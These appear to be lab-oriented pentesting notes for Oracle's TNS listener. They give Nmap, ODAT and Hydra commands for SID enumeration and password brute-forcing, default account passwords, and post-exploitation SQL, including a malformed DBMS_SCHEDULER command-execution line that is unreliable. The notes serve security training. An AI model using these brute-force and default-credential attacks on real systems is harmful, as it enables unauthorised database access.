Oracle TNS Pentesting Notes

Protocol Overview

Basic Information

  • Port: TCP 1521 (default)

  • Protocol Type: Application layer

  • Purpose: Database communication protocol for Oracle

  • Security: Supports encryption, access controls, and authentication

Protocol Features

  1. Network Protocols

    • TCP/IP

    • UDP

    • IPX/SPX

    • AppleTalk

  2. Security Features

    • SSL/TLS encryption

    • IPv6 support

    • Access control lists

    • PL/SQL restrictions

Initial Enumeration

Port Scanning

# Basic Nmap scan
nmap -p1521 -sV <target>

# Aggressive scan with scripts
nmap -p1521 -sV -sC -A <target>

# All Oracle scripts
nmap -p1521 --script oracle-* <target>
# Using TNSPing
tnsping <target>

# Using Nmap
nmap -p1521 -sV --script oracle-sid-brute <target>

# Using ODAT
./odat.py tnscmd -s <target> -p 1521

Anonymous/Default Access

Testing Default SIDs

# Using ODAT
./odat.py sidguesser -s <target> -p 1521

# Using Nmap
nmap -p1521 --script oracle-sid-brute <target>

# Manual connection
sqlplus scott/tiger@<target>:1521/ORCL

Common Default SIDs

ORCL
XE
PROD
DEV
TEST

Brute Force Attacks

Using ODAT

# Password guessing
./odat.py passwordguesser -s <target> -p 1521 -d XE

# Dictionary attack
./odat.py passwordguesser -s <target> -p 1521 -d XE --accounts-file accounts.txt

# Test multiple SIDs
./odat.py passwordguesser -s <target> -p 1521 -d ALL

Using Hydra

# Basic authentication
hydra -L users.txt -P passwords.txt oracle-listener://<target>

# Target specific SID
hydra -L users.txt -P passwords.txt oracle-sid://<target>/ORCL

Tool Installation

# Install ODAT and dependencies
sudo apt-get install libaio1 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule update

# Install Oracle Instant Client
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip

# Set environment
export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH
export PATH=$LD_LIBRARY_PATH:$PATH

# Install Python dependencies
pip3 install cx_Oracle
pip3 install colorlog termcolor passlib python-libnmap pycryptodome

Common NSE Scripts

# SID enumeration
nmap -p1521 --script oracle-sid-brute <target>

# TNS version
nmap -p1521 --script oracle-tns-version <target>

# Brute force
nmap -p1521 --script oracle-brute --script-args oracle-brute.sid=ORCL <target>

# Enumerate users
nmap -p1521 --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL <target>

Configuration Files

Server-side Files

# Listener configuration
$ORACLE_HOME/network/admin/listener.ora

# Security configuration
$ORACLE_HOME/network/admin/sqlnet.ora

# Access control
$ORACLE_HOME/network/admin/protocol.ora

Client-side Files

# Connection configuration
$ORACLE_HOME/network/admin/tnsnames.ora

# SQL*Net configuration
$ORACLE_HOME/network/admin/sqlnet.ora

Example Configurations

listener.ora

LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = orcl.inlanefreight.htb)(PORT = 1521))
      (ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC1521))
    )
  )

tnsnames.ora

ORCL =
  (DESCRIPTION =
    (ADDRESS_LIST =
      (ADDRESS = (PROTOCOL = TCP)(HOST = 10.129.11.102)(PORT = 1521))
    )
    (CONNECT_DATA =
      (SERVER = DEDICATED)
      (SERVICE_NAME = orcl)
    )
  )

Common Vulnerabilities

  1. Default Credentials:

    • SYSTEM/MANAGER

    • SYS/CHANGE_ON_INSTALL

    • SCOTT/TIGER

  2. Configuration Issues:

    • Weak passwords

    • Default SIDs

    • Unpatched vulnerabilities

    • Exposed listeners

  3. Known Attack Vectors:

    • TNS Poison

    • Password brute force

    • SID enumeration

    • PL/SQL injection

Post Exploitation

Information Gathering

-- Check current user privileges
SELECT * FROM user_role_privs;

-- List all users
SELECT * FROM all_users;

-- View database version
SELECT * FROM v$version;

-- List available databases
SELECT * FROM v$database;

Privilege Escalation

-- Check for DBA role
SELECT * FROM user_role_privs WHERE granted_role='DBA';

-- Execute system commands (if allowed)
SELECT DBMS_SCHEDULER.create_job('CMD','EXECUTABLE','/bin/bash');

-- Check for accessible PL/SQL procedures
SELECT * FROM all_procedures WHERE owner='SYS';

Common Response Codes

Code
Meaning

ORA-01017

Invalid username/password

ORA-12541

No listener

ORA-12505

SID not found

ORA-28000

Account locked

ORA-01031

Insufficient privileges

Best Practices for Pentesting

  1. Initial Reconnaissance:

    • Identify TNS version

    • Enumerate SIDs

    • Check for default credentials

    • Test listener status

  2. Deep Enumeration:

    • Map database structure

    • List available schemas

    • Check user privileges

    • Identify sensitive data

  3. Documentation:

    • Record found SIDs

    • Note vulnerable configurations

    • Document credentials

    • Save SQL query results

  4. Risk Assessment:

    • Evaluate data sensitivity

    • Assess privilege levels

    • Consider business impact

    • Prioritize findings

Common Tools Summary

  1. Enumeration:

    • ODAT

    • TNSPing

    • Nmap NSE scripts

    • SQLplus

  2. Exploitation:

    • ODAT modules

    • Metasploit

    • Custom SQL queries

    • SQLplus

  3. Post-Exploitation:

    • SQLplus

    • ODAT

    • Custom PL/SQL scripts

    • Database administration tools

PreviousIPMI Pentesting NotesNextMSSQL Pentesting Notes